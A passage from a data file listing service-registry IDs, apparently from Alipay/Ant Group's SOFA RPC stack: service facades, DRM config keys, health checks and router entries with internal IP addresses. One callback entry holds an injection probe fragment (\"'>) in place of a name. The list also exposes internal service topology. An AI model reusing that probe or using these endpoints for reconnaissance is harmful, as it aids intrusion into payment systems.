DRM","com.alipay.kbomp.common.service.facade.manager.api.ActivityAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_DEMO_SOFA3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imemberprod.service.facade.api.prod.SecurityMobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.BizDataStatsFacade:1.0:ebppcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@68c5ea639dfe#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_11.124.182.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpdcore:name=com.alipay.fc.prodquery.core.service.drm.PdCoreCacheRefreshDRM.switch2NewBizNo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.insproductcore.facade.service.InsChannelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-serverlessbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.79.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finopenscene@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ccmmosngw.facade.FCCCMGenericFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.envcenter.common.service.facade.api.PackageAppInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobileapp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudstrategy.facade.onekeysite.OneKeySiteCalcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.chongzhimobile.client.MobileMtsService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccorder.service.facade.api.AccountWithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.limitcum.service.facade.CumulateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_PCREDITTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.revcore.common.service.finaccenter.facade.api.CoaTemplateRelationDevFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingTimeRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.component.endpoint.sofarest.ServiceParametersRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.sla.businessroute.drm.BusinessRoutePolicy.whiteListVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbprocess.common.service.facade.callback.ProcessCallback:1.0:syncMachineCheckImageHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@gfinsight#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.workflow.common.service.facade.api.tsd.TsdAbilityFacade:1.0:opensupport_cloudparse_aliyunslsability@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.boss.facade.service.BossUserLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intl.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FinResultSumFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.internalUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iacctrans.service.facade.api.SubTransCodeConfigRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.deposit.ExpressDepositService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.das.biz.share.publish.PublishToDwdataManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.UserSpecifyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-gfas-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zpublish.common.service.facade.ExecutionServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.scene.ObjectFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.gfas.core.config.drm.GfasDrmResource.quotaBucketRouterCacheExpire,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.notifyUsers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.midasCommonTair_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.SpiderSocialSentimentDrm.sourceTypeCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundapplication.common.service.facade.api.newyearone.NewYearOneDynamicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unifiedlimit.facade.manage.RuleAdminQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.PermissionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.ItemMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.mng.ActivityAdminQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.diag.common.service.facade.AliyunKbFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_applyLpaOverDraftProcessCallBack2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.decision.common.service.facade.api.decisionversion.DecisionVersionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.21.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mquery.common.service.facade.report.TradeSummaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.29.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfinvest.facade.api.after.InvestDeliveryDetailsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.ZhouZhouLeInternalService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcmloanprod.common.service.facade.service.MiniLoanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.virtualprod.common.service.facade.lottery.LotterySiteinfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.stock.isStockDiscoveryDowngradeTopics,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csplatform.service.contact.facade.PhoneInfoService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.InstCooperationInfoOperateFacade:1.0:bksigncentre_instCooperationInfoOperateFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.v2.LabelCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.ny.VoteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@kbknowledgegraph#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finfoprod.common.service.facade.ActiveReportsServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.proxy.DepositProxyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:merchantsettle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acrescore.facade.AbilityFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_devicemtn_taskProcessFront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthopen2018twa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.mydds.core.crowd.drm.CrowdDsResource.dsName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.promoplaycenter.common.assist.facade.api.AssistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.alphasec.service.facade.AlphaSecEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.ReleaseDomainResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.192.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.decisionx.facade.api.DxVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.QueryAlipayDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArRefundPayOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.ExpressGatewayConfigResource.expressGatewayChannel,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dbackprod.service.facade.query.QueryCardInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pvsofaserver:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.biz.shared.cancelaccount.service.CancelZCBAccountCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FPLIQUIDATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.sloganInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:zmgo_opt_time_out_close@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_cardPackageEditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.prodcoreTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frdspcore.common.service.facade.api.EventRecordDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mayibank.bkprocecore.oyz.callback.publish.NDOCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.OpenFormManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insliveprod.common.service.facade.growth.UserTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartscene.common.facade.schedule.PlanScheduleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.CsivrCacheService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianQueueMax,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alifi.applycenter.services.admission.AdmissionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.147.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.236.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.SpiderSocialSentimentDrm.sourceTypeSubCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.account.VcpAssetAccountRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-rcdisposal-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbcdp.common.service.facade.advertisement.feedback.AdFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.biz.deduct.cae.service.CaeChargeAgentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestWorkToDoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbmall.facade.shop.indirect.IndirectShopOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.FinnetInfluxService:1.0:instfluxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.meta.MetaDrmDataIdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.itemcore.common.service.facade.v2.ItemQueryFacade:1.0:itemcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_instCooperationInfoCreateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.access.OauthLoginTokenServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchpunish.facade.cicada.suspectEvent.SuspectEventMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.LogTransferFacade:1.0:arLogTransferFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransPaycoreFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofa.facade.AppServerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ProfileConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.batch.api.BatchArchiveQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.acsellcore.common.service.facade.contract.ContractManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:alb_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferMemberManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitycap:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdatabus.service.facade.recovery.BizDataRecoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_FISCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.chair-script:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.poscore.SharedataDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.v2.task.facade.TaskFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:voucherprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowLabelInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.AutoInvestPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.tlouclient.TlouStandardBizQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.CapFcKmiService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\"'>@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.core.cpmproduct.repository.FinpwmCpmProductElementsRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antemc.service.facade.FaultDrillSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbarcenter.common.service.facade.ar.v2.ArrangementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_ALMCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.identifycore.common.service.manage.api.AccessChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antmember.common.service.facade.PointPrizeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gmodelcenter.common.service.api.standard.index.IndexRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mrchservbase#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.Arch:name=com.alipay.xts.ldc.clearingcenter.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.117.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:checkroute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.MessageFusionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gffund.common.service.facade.api.gfpayment.PaymentAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.25.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openauth.common.service.facade.rpc.AuthRelationVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:appxagg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:cloudmesh@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_BKEBANK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.mif.common.service.facade.tag.MerchantGZoneTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.asset.AssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.spi.api.MobileSyncUpstreamSpiService:1.0:adatabus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:finbaserviceB2CBackendCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CHARGE_EVENTS_BUF_SENDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.WTTicketQueryFacade:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:meshsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unimetaservice.facade.api.ConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.decisionx.facade.DataService:1.0:ins_marketing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.client.drm.TairToTbaseSwitch.fullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.distinguishprod.common.service.facade.activity.ActivityCBFacade:1.0:KIDS_INSHEALTHCORE_GAIN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:kgmng_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.iot.tangula.facade.custom.CustomDataService:1.0:tangula@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finriskmngcore.common.service.facade.api.InstInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryAccItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.business.spi.BusinessOpConfigConsultCallbackFacade:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.surlPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zparamcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.inspect.BatchInspectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.204.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.CertBindingService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acordercore.common.service.facade.query.OrderQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.framodel.core.service.facade.api.FramodelDataProcessorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2_dest.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.sfa.api.SfatransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_MDEVSUPPORT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.164.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antinvoice.biz.flow.service.InvoiceNotifierService:1.0:invoiceFileDownloadedNotifierService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.cashpool.AlmCashPoolExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:govbizprodsys@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:openmonitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.drm.BankFinancingDrmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.relation.FamilyRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:devserver-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoadTestControlDrm.shadowInvokeSwitchStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mobileorderprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:batchpayprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.246.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:omegakoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.DataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.ssrfPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.ctuevent.CtuAsynEventMileSearchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccfpcenter_oapProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimitnear:name=com.alipay.rule.core.repository.drm.RepositoryConfigResource.shareComparatorAndScriptCompileResult,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:cloudinc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.imemberprod.service.facade.api.PermissionAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.propagationUpdate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata.dwm.client.tenant.BboxTenantOperateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinspect.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.startFlow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#